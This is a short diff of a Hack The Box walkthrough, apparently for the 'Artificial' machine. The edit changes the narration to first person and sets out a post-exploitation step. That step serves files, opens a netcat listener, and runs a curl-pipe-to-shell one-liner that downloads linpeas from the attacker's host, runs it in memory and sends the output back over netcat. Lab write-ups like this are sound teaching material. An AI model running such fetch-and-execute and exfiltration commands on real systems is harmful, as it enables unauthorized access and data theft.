beaulieuhugo97/htb-walkthroughs/Artificial.md

 sudo python3 -m http.server 8888
 ```

-Before running it, we need to setup a listener for the incoming data:
+Before running it, I need to setup a listener for the incoming data:
 ```
 nc -lvnp 9999 > linpeas.out
 ```

-Once that's done, we download linpeas on the box from the attacker web server and run it from memory, sending the output to the attacker machine:
+Once that's done, I download linpeas on the box from my machine web server and run it from memory, sending the output to my machine:
 ```
 curl 10.10.14.9:8888/linpeas.sh | sh | nc 10.10.14.9 9999
 ```